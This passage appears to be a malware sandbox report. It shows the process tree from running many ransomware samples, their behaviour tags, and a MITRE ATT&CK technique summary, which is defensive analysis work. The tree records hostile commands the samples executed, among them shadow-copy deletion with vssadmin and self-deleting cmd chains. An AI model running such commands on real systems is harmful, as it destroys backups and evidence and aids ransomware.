            [7] PID 5148  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                cmd: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
                - System Location Discovery: System Language Discovery
                - Suspicious use of AdjustPrivilegeToken
              [8] PID 5696  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 936
                  - Program crash
              [8] PID 6908  C:\Windows\SysWOW64\WerFault.exe
                  cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1032
                  - Program crash
        [5] PID 3616  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            cmd: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          [6] PID 4260  C:\Windows\SysWOW64\explorer.exe
              cmd: explorer.exe
          [6] PID 5276  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
              cmd: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
            [7] PID 5672  C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 936
                - Program crash
            [7] PID 6164  C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1044
                - Program crash
      [4] PID 216  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
          cmd: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe
          - Checks computer location settings
          - Executes dropped EXE
          - Enumerates connected drives
          - System Location Discovery: System Language Discovery
          - Checks processor information in registry
        [5] PID 1712  C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe" /f /q
            - System Location Discovery: System Language Discovery
          [6] PID 7776  C:\Windows\SysWOW64\timeout.exe
              cmd: timeout -c 5
              - Delays execution with timeout.exe
      [4] PID 2296  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
          cmd: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe
          - Checks computer location settings
          - Executes dropped EXE
          - Enumerates connected drives
          - System Location Discovery: System Language Discovery
          - Checks processor information in registry
        [5] PID 3056  C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe" /f /q
            - System Location Discovery: System Language Discovery
          [6] PID 7252  C:\Windows\SysWOW64\timeout.exe
              cmd: timeout -c 5
              - System Location Discovery: System Language Discovery
              - Delays execution with timeout.exe
      [4] PID 1080  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe
          cmd: Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe
          - Modifies WinLogon for persistence
          - Executes dropped EXE
          - Adds Run key to start application
          - System Location Discovery: System Language Discovery
      [4] PID 1764  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe
          cmd: Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe
          - Executes dropped EXE
        [5] PID 5068  C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio
            cmd: C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio /go
            - Executes dropped EXE
          [6] PID 3200  C:\Windows\SYSTEM32\cmd.exe
              cmd: cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio" & del "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio" & rd "C:\Users\Admin\AppData\Roaming\FuzzyDfs\"
            [7] PID 9016  C:\Windows\system32\waitfor.exe
                cmd: waitfor /t 10 pause /d y
            [7] PID 3028  C:\Windows\system32\attrib.exe
                cmd: attrib -h "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio"
                - Views/modifies file attributes
        [5] PID 2384  C:\Windows\SYSTEM32\cmd.exe
            cmd: cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe" & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe" & rd "C:\Users\Admin\Desktop\00424\"
          [6] PID 8372  C:\Windows\system32\waitfor.exe
              cmd: waitfor /t 10 pause /d y
          [6] PID 8484  C:\Windows\system32\attrib.exe
              cmd: attrib -h "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe"
              - Views/modifies file attributes
      [4] PID 372  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe
          cmd: Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
      [4] PID 2128  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe
          cmd: Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
      [4] PID 4344  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe
          cmd: Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
      [4] PID 5544  C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe
          cmd: Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe
          - Executes dropped EXE
          - Adds Run key to start application
      [4] PID 6104  C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe
          cmd: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe
          - Checks computer location settings
          - Executes dropped EXE
          - Enumerates connected drives
          - System Location Discovery: System Language Discovery
        [5] PID 6952  C:\Windows\System32\cmd.exe
            cmd: "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          [6] PID 2224  C:\Windows\system32\vssadmin.exe
              cmd: vssadmin.exe delete shadows /all /quiet
              - Interacts with shadow copies
        [5] PID 2288  C:\Windows\System32\cmd.exe
            cmd: "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          [6] PID 6216  C:\Windows\system32\vssadmin.exe
              cmd: vssadmin.exe delete shadows /all /quiet
              - Interacts with shadow copies
      [4] PID 8248  C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
          cmd: UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of SetWindowsHookEx
      [4] PID 6232  C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe
          cmd: UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
        [5] PID 6188  C:\Windows\SysWOW64\WerFault.exe
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 1184
            - Program crash
      [4] PID 5656  C:\Users\Admin\Desktop\00424\VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
          cmd: VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe
          - Executes dropped EXE
          - Accesses Microsoft Outlook profiles
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - outlook_office_path
          - outlook_win_path
      [4] PID 6764  C:\Users\Admin\Desktop\00424\VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe
          cmd: VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx

[1] PID 4548  C:\Windows\system32\svchost.exe
    cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

[1] PID 5224  C:\Windows\System32\svchost.exe
    cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv

[1] PID 5728  C:\Windows\ditziw.exe
    cmd: C:\Windows\ditziw.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory

[1] PID 6016  C:\Windows\SysWOW64\WerFault.exe
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1136 -ip 1136

[1] PID 5508  C:\Windows\explorer.exe
    cmd: explorer.exe

[1] PID 6388  C:\Windows\SysWOW64\werfault.exe
    cmd: werfault.exe /h /shared Global\0325edc963f2448cbc163425adc7667f /t 3272 /p 1080

[1] PID 6680  C:\Windows\SysWOW64\WerFault.exe
    cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5536 -ip 5536
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6620
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\f9231c2229c54e7db7ffa5456c196bb3 /t 1572 /p 21841⤵PID:556
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:6848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6232 -ip 62321⤵PID:4104
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:7780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5276 -ip 52761⤵PID:5272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5148 -ip 51481⤵PID:5432
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5644
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5276 -ip 52761⤵PID:6536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5148 -ip 51481⤵PID:6564
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
PID:6804
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:8384
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:7840
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1968
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8508
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7760
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8340
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6104
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3440
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5880
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3136
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9656
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9800
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6588
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2964
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9588
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9824
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6364
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5612
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7160
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6512
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6896
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8636
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3500
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6412
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6944
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8364
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9940
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6960
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9668
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1732
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4984
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5076
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7452
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3236
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7144
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5516
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7056
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2728
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10084
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8484
-
C:\Windows\TEMP\hrl8BC3.tmpC:\Windows\TEMP\hrl8BC3.tmp2⤵PID:10124
-
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1464
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6876
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4504
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8436
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6084
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2456
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10204
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10028
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9912
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5836
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8008
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2956
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1792
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5860
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9024
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7468
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7284
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8908
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6704
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6328
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2948
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6100
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9872
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:292
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6164
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4492
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4692
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8904
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5932
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6516
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5668
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8552
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7048
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5868
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10144
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8464
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4352
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9820
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6888
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7820
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8776
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5892
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6700
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5940
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8836
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10076
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6424
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7344
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5228
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1328
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8852
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6436
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6212
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7556
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7420
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9392
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7260
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6584
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6304
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7228
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7004
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7348
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3948
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5524
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7320
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5468
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- Windows Management Instrumentation (1)
Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (2)
  - Change Default File Association (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (2)
  - Change Default File Association (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Direct Volume Access (1)
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (3)
  - Disable or Modify System Firewall (2)
  - Disable or Modify Tools (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (8)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (2)
  - Credentials from Web Browsers (1)
  - Windows Credential Manager (1)
- Unsecured Credentials (2)
  - Credentials In Files (2)
Discovery
- Browser Information Discovery (1)
- Network Service Discovery (1)
- Peripheral Device Discovery (2)
- Permission Groups Discovery (1)
  - Local Groups (1)
- Query Registry (9)
- Remote System Discovery (1)
- System Information Discovery (8)
- System Location Discovery (1)
  - System Language Discovery (1)
- System Network Configuration Discovery (1)
  - Internet Connection Discovery (1)
- Virtualization/Sandbox Evasion (2)
Downloads